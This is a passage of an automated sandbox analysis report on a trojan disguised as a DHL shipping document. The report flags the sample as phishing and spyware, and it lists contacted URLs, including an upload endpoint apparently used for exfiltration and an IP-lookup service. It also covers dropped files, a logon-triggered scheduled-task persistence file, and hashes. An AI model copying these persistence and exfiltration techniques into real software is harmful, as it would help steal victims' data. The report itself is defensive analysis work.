                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.fonts.comDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.sandoll.co.krDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0bhvE48A.tmp.11.drfalse
                                                                                                        		high
                                                                                                        http://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4-AAAAid7__f_bhvE48A.tmp.11.drfalse
                                                                                                          		high
                                                                                                          http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&euconsent=BOi01ZPOi01ZPAcABBENB4-AAAbhvE48A.tmp.11.drfalse
                                                                                                            		high
                                                                                                            http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4-bhvE48A.tmp.11.drfalse
                                                                                                              		high
                                                                                                              https://www.google.com/pagead/drt/uivbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                                                                                		high
                                                                                                                http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ3OGFmNTY2YzEzMzI1ZTIwNzU3Y2FhOTg3NTNjNGRmMzYwZbhvE48A.tmp.11.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://widgets.outbrain.com/widgetOBUserSync/obUserSync.htmlbhvE48A.tmp.11.drfalse
                                                                                                                  		high
                                                                                                                  http://pomf.cat/upload.phpDHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://www.google.com/chrome/static/js/installer.min.jsbhvE48A.tmp.11.drfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/chrome/static/images/download-browser/pixel_tablet.pngbhvE48A.tmp.11.drfalse
                                                                                                                      		high
                                                                                                                      https://cvision.media.net/new/300x194/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9bhvE48A.tmp.11.drfalse
                                                                                                                        		high
                                                                                                                        https://widgets.outbrain.com/widgetOBUserSync/obUserSync.htmlhttp://s.amazon-adsystem.com/x/da2e6c89vbc.exe, 0000000B.00000003.300248743.00000000021AB000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://bot.whatismyipaddress.com/DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvE48A.tmp.11.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://www.google.com/chrome/static/images/homepage/google-beta.pngbhvE48A.tmp.11.drfalse
                                                                                                                              		high
                                                                                                                              http://www.msn.com/de-ch/?ocid=iehpbhvE48A.tmp.11.drfalse
                                                                                                                                		high
                                                                                                                                https://www.google.com/chrome/static/images/icon-file-download.svgbhvE48A.tmp.11.drfalse
                                                                                                                                  		high
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9bhvE48A.tmp.11.drfalse
                                                                                                                                      		high
                                                                                                                                      http://www.founder.com.cn/cnDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101bhvE48A.tmp.11.drfalse
                                                                                                                                        		high
                                                                                                                                        http://acdn.adnxs.com/dmp/async_usersync.htmlbhvE48A.tmp.11.drfalse
                                                                                                                                          		high
                                                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1bhvE48A.tmp.11.drfalse
                                                                                                                                            		high
                                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47bhvE48A.tmp.11.drfalse
                                                                                                                                              		high
                                                                                                                                              http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgbhvE48A.tmp.11.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://sb.scorecardresearch.com/beacon.jsbhvE48A.tmp.11.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtbhvE48A.tmp.11.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1res://C:vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://ib.adnxs.com/async_usersync_filevbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvE48A.tmp.11.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/chrome/static/images/folder-applications.svgbhvE48A.tmp.11.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211bhvE48A.tmp.11.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://b1t-use2.zemanta.com/t/imp/impression/FZV2QWU7KWGCXF6REQZNFCRJIZ4GXAXBRWOOIKPCGXHSIEOKHUJBTWLbhvE48A.tmp.11.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhvE48A.tmp.11.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/chrome/static/images/chrome-logo.svgbhvE48A.tmp.11.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhvE48A.tmp.11.drfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.collada.org/2005/11/COLLADASchema9DoneDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.sajatypeworks.comDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious

                                                                                                                                                                Private

                                                                                                                                                                IP
                                                                                                                                                                192.168.2.1

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                Analysis ID:502165
                                                                                                                                                                Start date:13.10.2021
                                                                                                                                                                Start time:17:07:49
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 11m 40s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Sample file name:DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                Number of analysed new started processes analysed:29
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.phis.troj.spyw.evad.winEXE@10/7@0/1
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 7.6% (good quality ratio 6.4%)
                                                                                                                                                                • Quality average: 72.5%
                                                                                                                                                                • Quality standard deviation: 35.8%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                • Number of executed functions: 158
                                                                                                                                                                • Number of non-executed functions: 294
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.50.102.62, 131.253.33.200, 13.107.22.200, 95.100.218.79, 95.100.216.89, 20.82.210.154, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33
                                                                                                                                                                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                17:08:56API Interceptor3x Sleep call for process: DHL_AWB 518877882999_887755468_pdf.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                No context

                                                                                                                                                                Domains

                                                                                                                                                                No context

                                                                                                                                                                ASN

                                                                                                                                                                No context

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_AWB 518877882999_887755468_pdf.exe.log
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                Entropy (8bit):5.355304211458859
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                Malicious:true
                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\2e8f43fa-ffff-b936-99ba-10ff8c640f0d
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):108
                                                                                                                                                                Entropy (8bit):5.483051887012622
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:/o3Q2QffK1zJcNXCcBpVIYmmrfwEkzfuB4n:/yjQfi1uN/cmsVz2B4
                                                                                                                                                                MD5:F011D936EB499ED9028D1DF4162D136F
                                                                                                                                                                SHA1:0CC320DB0A1ADE3C5A4278C09259772C879B7B57
                                                                                                                                                                SHA-256:2D6375D75D48604E8AA5C9D9064C82D93457340244E1D62BDF1C73A34EEA941D
                                                                                                                                                                SHA-512:FE5ACE131B3DE321C6B8CCFA47CC31BC809D421C44F9AB4A0383BA5515DC38A858D87579605264C82E4890626B3E5E92B3D7E0AA73889A41E37D93DF13CBA384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: vMSR5XyDGaw1S/nFeKjG9z/ZXgLmXlt/JGB9hvSuvggzH9mecNyELmNW3haEhSc8aHNinZpbl/Y5zC3qc6wI9aD3dF0Mi2J9szSa7WRm4cg=
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\bhvE48A.tmp
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb0d9183e, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                Entropy (8bit):1.0399297131617353
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:mcqhtSFKmLncRDPf6r0i1cREikolT3YEgI:6sLncx6r4
                                                                                                                                                                MD5:667F3E0A8064B46D23483A3AB5336CA2
                                                                                                                                                                SHA1:4D98A6C8A7FCD6D0D06697A19260C42ED749E782
                                                                                                                                                                SHA-256:47D0B6AE151AFDFE0352F84ECEB9FA18E0978C265A408B70E4CEE9B87091465B
                                                                                                                                                                SHA-512:3BE3AC56C84550648AEE973DB0EF4A1347A39C3DA8B6656B5977BC1E1A1224CACC22D8E785E50DCC23DA1947154CF0B732251E1F8862D89DDC7E27E0B24A17B0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ...>... ........9......p*.~.....w7..................................x..!....ye.h...........................z........w.............................................................................................._............B.................................................................................................................. ............y......................................................................................................................................................................................................................................'Z.t.....y..................R..;%....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp70BF.tmp
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1656
                                                                                                                                                                Entropy (8bit):5.171528568960239
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhH7MlNQ8/rydbz9I3YODOLNdq3L
                                                                                                                                                                MD5:AD951DCF7ECF37B0A4AA857B0D7403AE
                                                                                                                                                                SHA1:1C1E2C51F466443132BF5A6CE55EDEB1116DBCFB
                                                                                                                                                                SHA-256:1B58ED120BD7682F12CD22BC580B62BC0E3020DFBDE0444A68B654E93248DFEE
                                                                                                                                                                SHA-512:C4C2F68B0A1D5571B57A777D369BB9DDF3A4B36B686A4E04BC2BF464887A8E196A695B5D6ABFF0AFACCB3A89E3C6C16D793A9DCAB6227240FE9BF04F63F53D7B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv
                                                                                                                                                                C:\Users\user\AppData\Roaming\cmsyNzu.exe
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1078272
                                                                                                                                                                Entropy (8bit):7.772035339679424
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:+yEc0kMMFANUc0FBcm6YAVjfsxogLMkB:1Ec0LWI+EJ3jYo3kB
                                                                                                                                                                MD5:7D11E82579E2A0628CA3C855AFE34FD1
                                                                                                                                                                SHA1:D6ABBBE7F991E79C3BC51480314386C0CCE5F2B9
                                                                                                                                                                SHA-256:691CB999C6BE0F430C14A9411ABF6796F174C8D8F3C3EDC4B819B3B35972D832
                                                                                                                                                                SHA-512:1939E68DAE222D5F7E4391C041EBEA87194E5BE8A9CEC6BC3BA83D1DC2242377ECE4E63BF8893CF9524C5933E2A6C9B3AE880DC5C0FE57B0125D0A09FAEADAE0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0..h.............. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text....f... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B.......................H........q..........y...p...................................................2..t...Q9.t<y.^>.s..o..f..p\.~<.S,..../........V.C:!*T7.b..,.k...V.5.Z...k...M"Z{.HX<<.$s..~o.....X.\*.-.... ".o...62..7......X....,.............N"..S.'.B..~.....Q..o..$.2.5<e...&.KA.J..k..uu.L....Z.W...r|zS. .W.f.!i....Q.2.T..8$Y.d..V.....K..... .r./.....}tye.....?.D.VO_.C.hR.~=..nx.`..B..Q...{..Y...f.E.Br:.a.)O=..@C-P.s.."....L......[.j....0N...1.......S.C.. a<-.......vI.Y....X+.Zj.
                                                                                                                                                                C:\Users\user\AppData\Roaming\cmsyNzu.exe:Zone.Identifier
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26
                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Entropy (8bit):7.772035339679424
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                File name:DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File size:1078272
                                                                                                                                                                MD5:7d11e82579e2a0628ca3c855afe34fd1
                                                                                                                                                                SHA1:d6abbbe7f991e79c3bc51480314386c0cce5f2b9
                                                                                                                                                                SHA256:691cb999c6be0f430c14a9411abf6796f174c8d8f3c3edc4b819b3b35972d832
                                                                                                                                                                SHA512:1939e68dae222d5f7e4391c041ebea87194e5be8a9cec6bc3ba83d1dc2242377ece4e63bf8893cf9524c5933e2a6c9b3ae880dc5c0fe57b0125d0a09faeadae0
                                                                                                                                                                SSDEEP:24576:+yEc0kMMFANUc0FBcm6YAVjfsxogLMkB:1Ec0LWI+EJ3jYo3kB
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0..h............... ........@.. ....................................@................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:00828e8e8686b000

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x5086ee
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                Time Stamp:0x61667FF1 [Wed Oct 13 06:42:57 2021 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                                                                                OS Version Major:4
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:4
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
